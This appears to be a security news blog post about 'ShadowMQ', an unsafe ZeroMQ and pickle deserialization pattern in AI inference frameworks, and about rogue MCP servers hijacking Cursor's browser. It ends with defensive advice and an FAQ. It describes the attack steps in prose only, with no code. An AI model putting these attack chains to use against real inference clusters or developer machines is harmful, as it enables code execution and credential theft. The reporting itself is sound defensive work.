Modern AI stacks shipped a cluster of bugs that look almost custom-built for attackers. Critical remote code execution flaws in inference frameworks from ๐ ๐ฒ๐๐ฎ, ๐ก๐ฉ๐๐๐๐, ๐ ๐ถ๐ฐ๐ฟ๐ผ๐๐ผ๐ณ๐, and open-source projects like ๐๐๐๐ , ๐ฆ๐๐๐ฎ๐ป๐ด and ๐ ๐ผ๐ฑ๐๐น๐ฎ๐ฟ ๐ ๐ฎ๐ ๐ฆ๐ฒ๐ฟ๐๐ฒ๐ฟ all trace back to the same design mistake: unsafe ZeroMQ messaging combined with Python ๐ฝ๐ถ๐ฐ๐ธ๐น๐ฒ deserialization. At the same time, research into ๐๐๐ฟ๐๐ผ๐ฟโ๐ AI-powered IDE shows that attackers can hijack its built-in browser and turn a developer workstation into a fully privileged malware delivery platform.
Together, these issues show how quickly insecure patterns can propagate across AI infrastructure and development tools when teams copy architecture and code without hardening it. For defenders, they are a concrete reminder that โAI securityโ is not theoretical anymore; it is a classic RCE and supply-chain problem wearing a new label.
๐ฆ๐ต๐ฎ๐ฑ๐ผ๐๐ ๐ค: ๐๐ป๐๐ฎ๐ณ๐ฒ ๐ญ๐ฒ๐ฟ๐ผ๐ ๐ค + ๐ฝ๐ถ๐ฐ๐ธ๐น๐ฒ ๐ฎ๐ ๐ฎ ๐ฝ๐ฎ๐๐๐ฒ๐ฟ๐ป, ๐ป๐ผ๐ ๐ฎ ๐๐ถ๐ป๐ด๐น๐ฒ ๐ฏ๐๐ด
The first piece of the picture sits inside Metaโs ๐๐น๐ฎ๐บ๐ฎ ๐ฆ๐๐ฎ๐ฐ๐ธ. In affected versions, the framework exposed a ZeroMQ socket over the network and then used ๐ฟ๐ฒ๐ฐ๐_๐ฝ๐๐ผ๐ฏ๐ท() to deserialize incoming traffic via Pythonโs ๐ฝ๐ถ๐ฐ๐ธ๐น๐ฒ module. In other words, any endpoint that could talk to that socket could send a crafted object and gain ๐ฟ๐ฒ๐บ๐ผ๐๐ฒ ๐ฐ๐ผ๐ฑ๐ฒ ๐ฒ๐ ๐ฒ๐ฐ๐๐๐ถ๐ผ๐ป on the inference node. That flaw shipped as ๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฐ-๐ฑ๐ฌ๐ฌ๐ฑ๐ฌ and was later patched by switching to safer JSON-based serialization.
However, the more serious story is what happened next. The same unsafe pattern ZeroMQ sockets exposed over TCP, unauthenticated endpoints, and direct pickle deserialization showed up across multiple AI inference frameworks maintained by different vendors and communities. Oligoโs research team labeled this propagation pattern ๐ฆ๐ต๐ฎ๐ฑ๐ผ๐๐ ๐ค: an architecture bug that quietly spread through the ecosystem as teams copied and adapted reference code.ย
As the analysis expanded, researchers documented near-identical logic in:
-
๐๐๐๐ (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฑ-๐ฏ๐ฌ๐ญ๐ฒ๐ฑ)
-
๐ก๐ฉ๐๐๐๐ ๐ง๐ฒ๐ป๐๐ผ๐ฟ๐ฅ๐ง-๐๐๐ (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฑ-๐ฎ๐ฏ๐ฎ๐ฑ๐ฐ)
-
๐ ๐ผ๐ฑ๐๐น๐ฎ๐ฟ ๐ ๐ฎ๐ ๐ฆ๐ฒ๐ฟ๐๐ฒ๐ฟ (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฑ-๐ฒ๐ฌ๐ฐ๐ฑ๐ฑ)
-
๐ ๐ถ๐ฐ๐ฟ๐ผ๐๐ผ๐ณ๐โ๐ ๐ฆ๐ฎ๐ฟ๐ฎ๐๐ต๐ถ-๐ฆ๐ฒ๐ฟ๐๐ฒ and the ๐ฆ๐๐๐ฎ๐ป๐ด project, with partial or incomplete fixes at disclosure time.ย
From a defensive perspective, ShadowMQ matters less as โjust a bugโ and more as a supply-chain symptom. When core AI frameworks publish vulnerable patterns in their reference designs, that code doesnโt stay local; it shows up in forks, wrappers, and vendor products that trust the original implementation. That is exactly what we see here.
๐๐ผ๐ ๐๐ต๐ฒ๐๐ฒ ๐๐ ๐ฏ๐๐ด๐ ๐๐๐ฟ๐ป ๐ถ๐ป๐๐ผ ๐ฟ๐ฒ๐ฎ๐น ๐ฎ๐๐๐ฎ๐ฐ๐ธ ๐ฐ๐ต๐ฎ๐ถ๐ป๐
In practice, exploitation still requires an attacker to reach the ZeroMQ endpoints. However, many AI deployments run inference servers inside flat internal networks, on shared Kubernetes clusters, or behind load balancers that developers treat as โtrusted.โ Once an attacker lands anywhere in that environment via compromised credentials, a cloud misconfiguration, or a separate application bugโthey can:
-
Connect to the exposed ZMQ socket.
-
Ship a malicious pickle object that abuses the unsafe ๐ฟ๐ฒ๐ฐ๐_๐ฝ๐๐ผ๐ฏ๐ท() logic.
-
Gain code execution on the inference node and pivot across the AI cluster.
At that point, the difference between โAI bugโ and โstandard infrastructure compromiseโ disappears. Attackers can:
-
Steal model weights and training data.
-
Tamper with responses and silently poison downstream applications.
-
Deploy additional malware such as crypto-miners or lateral-movement tooling.ย
Because these inference engines often sit at the center of latency-sensitive workloads, defenders rarely instrument them as heavily as traditional front-end services. As a result, a ShadowMQ exploit can look like โjust another internal service talking to the model,โ while in reality it runs arbitrary Python code inside the cluster.
๐๐ฐ๐ต๐ผ๐ฒ๐ ๐ผ๐ณ ๐๐น๐ฎ๐บ๐ฎโ๐ ๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฐ-๐ฑ๐ฌ๐ฌ๐ฑ๐ฌ ๐ถ๐ป ๐๐๐๐ , ๐ง๐ฒ๐ป๐๐ผ๐ฟ๐ฅ๐ง-๐๐๐ , ๐ฎ๐ป๐ฑ ๐ผ๐๐ต๐ฒ๐ฟ ๐ณ๐ฟ๐ฎ๐บ๐ฒ๐๐ผ๐ฟ๐ธ๐
Metaโs Llama-Stack vulnerability (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฐ-๐ฑ๐ฌ๐ฌ๐ฑ๐ฌ) was the first widely documented example. The fix replaced pickle with JSON and tightened the messaging interface.ย
Later, as researchers audited related projects, they found:
-
๐ฉ๐น๐น๐บโ๐ ๐ฉ๐ฌ ๐ฒ๐ป๐ด๐ถ๐ป๐ฒ accepted data from a ZeroMQ SUB socket and deserialized it using pickle, enabling RCE across nodes in a multi-host deployment (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฑ-๐ฏ๐ฌ๐ญ๐ฒ๐ฑ).ย
-
๐ก๐ฉ๐๐๐๐ ๐ง๐ฒ๐ป๐๐ผ๐ฟ๐ฅ๐ง-๐๐๐ shipped a Python executor flaw (๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฑ-๐ฎ๐ฏ๐ฎ๐ฑ๐ฐ) that allowed lower-privilege access to escalate into full code execution and data tampering on the inference server.
-
๐ ๐ผ๐ฑ๐๐น๐ฎ๐ฟ ๐ ๐ฎ๐ ๐ฆ๐ฒ๐ฟ๐๐ฒ๐ฟ and ๐ฆ๐๐๐ฎ๐ป๐ด reused logic adapted from vLLM, carrying the same unsafe pattern forward in slightly altered form.ย
For defenders, this looks very similar to what we already know from classic OSS supply-chain incidents. Reference code that uses unsafe deserialization with ๐ฝ๐ถ๐ฐ๐ธ๐น๐ฒ and ๐ญ๐ฒ๐ฟ๐ผ๐ ๐ค becomes a template. Even if each project tweaks names or control flow, the underlying risk remains identical.
๐๐๐ฟ๐๐ผ๐ฟโ๐ ๐ฏ๐ฟ๐ผ๐๐๐ฒ๐ฟ ๐ฎ๐ป๐ฑ ๐ฅ๐ข๐๐จ๐ ๐ ๐๐ฃ ๐๐ฒ๐ฟ๐๐ฒ๐ฟ๐: ๐๐๐ฟ๐ป๐ถ๐ป๐ด ๐๐ ๐๐๐๐ ๐ถ๐ป๐๐ผ ๐บ๐ฎ๐น๐๐ฎ๐ฟ๐ฒ ๐ฑ๐ฒ๐น๐ถ๐๐ฒ๐ฟ๐ ๐ฝ๐น๐ฎ๐๐ณ๐ผ๐ฟ๐บ๐
The second half of the research focuses on ๐๐๐ฟ๐๐ผ๐ฟ, an AI-powered code editor built on top of the VS Code / Electron stack. Its new built-in browser and Model Context Protocol (๐ ๐๐ฃ) support give AI agents more reach into web apps and internal tools. Unfortunately, they also give attackers a much larger attack surface.ย
Knosticโs analysis shows that a malicious local MCP server can:
-
Register itself via a benign-looking ๐บ๐ฐ๐ฝ.๐ท๐๐ผ๐ป config.
-
Inject JavaScript into Cursorโs internal browser at runtime.
-
Replace real login pages with phishing pages that steal credentials and send them to an attacker-controlled endpoint.ย
Because Cursor inherits Node.js and Electronโs privileges, malicious JavaScript running in that context can access local files, modify extensions, and persist changes that survive restarts. Previous research into Cursor and VS Code already demonstrated similar risks under names like โCurXecuteโ and โMCPoison,โ where flawed MCP handling enabled remote or arbitrary code execution against developer machines.ย
In other words, once an attacker convinces a developer to enable a rogue MCP server or install a compromised extension, the IDE effectively becomes an ๐ฒ๐น๐ฒ๐๐ฎ๐๐ฒ๐ฑ ๐บ๐ฎ๐น๐๐ฎ๐ฟ๐ฒ ๐ฎ๐ด๐ฒ๐ป๐. It can read SSH keys, manipulate repos, poison CI pipelines, and push backdoored code into production.
๐ช๐ต๐ ๐๐ต๐ฒ๐๐ฒ ๐ฏ๐๐ด๐ ๐๐ต๐ผ๐ ๐ฎ ๐ฏ๐ฟ๐ผ๐ฎ๐ฑ๐ฒ๐ฟ ๐๐ ๐๐๐ฝ๐ฝ๐น๐-๐ฐ๐ต๐ฎ๐ถ๐ป ๐ฝ๐ฟ๐ผ๐ฏ๐น๐ฒ๐บ
From a seasoned defenderโs perspective, none of this is really โnew.โ We have seen unsafe deserialization, over-privileged services, and IDE extension abuse for years. What changed is the velocity and blast radius. AI frameworks and MCP servers are:
-
widely reused as reference implementations,
-
packaged into turnkey stacks and SaaS offerings, and
-
deployed deep inside both infrastructure and developer workflows.ย
As a result, a single design mistake like treating ZeroMQ + pickle as โgood enoughโ for internal messaging, or trusting MCP servers by default can propagate into hundreds or thousands of downstream environments. When those components sit next to GPUs, production models, or CI/CD secrets, the risk profile escalates quickly.
๐ฃ๐ฟ๐ฎ๐ฐ๐๐ถ๐ฐ๐ฎ๐น ๐ฑ๐ฒ๐ณ๐ฒ๐ป๐๐ฒ: ๐๐ต๐ฎ๐ ๐๐ผ ๐ฐ๐ต๐ฎ๐ป๐ด๐ฒ ๐ถ๐ป ๐๐ ๐ถ๐ป๐ณ๐ฟ๐ฎ ๐ฎ๐ป๐ฑ ๐ฑ๐ฒ๐ ๐๐ผ๐ผ๐น๐ถ๐ป๐ด
For AI platform teams, a few moves now pay off later:
First, treat ๐๐ป๐ณ๐ฒ๐ฟ๐ฒ๐ป๐ฐ๐ฒ ๐ฒ๐ป๐ด๐ถ๐ป๐ฒ๐ ๐ฎ๐ ๐๐ต๐ฟ๐ฒ๐ฎ๐ ๐ฏ๐ผ๐๐ป๐ฑ๐ฎ๐ฟ๐ถ๐ฒ๐, not internal plumbing. That means blocking direct network exposure for ZeroMQ and similar protocols, using mTLS or authenticated channels where possible, and isolating inference nodes into dedicated segments with tight egress controls.
Second, aggressively ๐ฒ๐น๐ถ๐บ๐ถ๐ป๐ฎ๐๐ฒ ๐๐ป๐๐ฎ๐ณ๐ฒ ๐ฑ๐ฒ๐๐ฒ๐ฟ๐ถ๐ฎ๐น๐ถ๐๐ฎ๐๐ถ๐ผ๐ป. If any component uses Pythonโs ๐ฝ๐ถ๐ฐ๐ธ๐น๐ฒ, Javaโs native serialization, or similar formats to deserialize untrusted or semi-trusted data from the network, that code should be treated as a vulnerability until proved otherwise. Safer formats (JSON, Protobuf, Capโn Proto) and strict schema validation should be the baseline.
Third, extend ๐ฟ๐ฎ๐ป๐๐ผ๐ป๐๐ฎ๐ฟ๐ฒ-๐๐๐๐น๐ฒ ๐ต๐ฎ๐ฟ๐ฑ๐ฒ๐ป๐ถ๐ป๐ด to AI clusters. That includes strict identity for machine-to-machine traffic, dedicated backup strategies for model artifacts and training data, and continuous inventory of where each inference framework version runs inside the estate.
On the developer side, organizations should treat AI-powered IDEs like any other high-value endpoint:
-
Disable or constrain ๐๐๐๐ผ-๐ฅ๐๐ป behavior for MCP servers and extensions.
-
Maintain a curated allowlist of trusted MCP servers, with code review requirements and explicit ownership.
-
Monitor for new or unapproved MCP endpoints and browser components inside IDEs.
-
Educate developers that โAI helper serversโ are ๐ฟ๐ฒ๐บ๐ผ๐๐ฒ ๐ฐ๐ผ๐ฑ๐ฒ ๐ฒ๐ ๐ฒ๐ฐ๐๐๐ถ๐ผ๐ป ๐๐ฒ๐ฐ๐๐ผ๐ฟ๐, not harmless sidecars.ย
Finally, AI security needs to plug into existing threat-modeling and vulnerability-management programs, not operate as a separate track. ShadowMQ and the Cursor browser bugs are classic examples of why: they are not โprompt injection problems,โ they are direct RCE and supply-chain issues that just happen to live inside AI-branded software.
๐๐๐ค๐
Q: What is ShadowMQ in the context of AI security?
A: ShadowMQ is a pattern where AI frameworks reuse ZeroMQ messaging code that deserializes network data with Pythonโs pickle, creating repeatable RCE conditions across Meta Llama-Stack, vLLM, TensorRT-LLM, and related projects. The Hacker News+5Oligo Security+5NVD+5
Q: How serious are the CVEs tied to these AI inference engines?
A: CVE-2024-50050, CVE-2025-30165, and CVE-2025-23254 all enable code execution on inference servers under realistic conditions, which can lead to model theft, data exposure, and further compromise of connected systems. NVD+5NVD+5NVD+5
Q: Do these vulnerabilities require direct internet exposure of the AI service?
A: Not necessarily. Attackers can often reach ZeroMQ endpoints from inside the network after exploiting other services, misconfigurations, or stolen credentials, then use ShadowMQ-style flaws as a lateral-movement amplifier. Feedly+4Oligo Security+4NVD+4
Q: How can a rogue MCP server compromise a developer using Cursor?
A: A malicious MCP server can inject JavaScript into Cursorโs built-in browser, replace login flows with phishing pages, and run with the IDEโs privileges to read files, modify extensions, and persist malware inside the development environment. Cursor+4Knostic+4Knostic+4
Q: What are the most effective short-term mitigations?
A: Inference teams should disable unsafe serialization, patch to fixed versions, and isolate AI services. Developer teams should lock down MCP usage, vet extensions, and treat AI IDEs as privileged endpoints that require monitoring and hardening. Snyk+6Oligo Security+6wiz.io+6
One thought on “Serious AI Bugs Expose Meta, Nvidia and Microsoft Inference”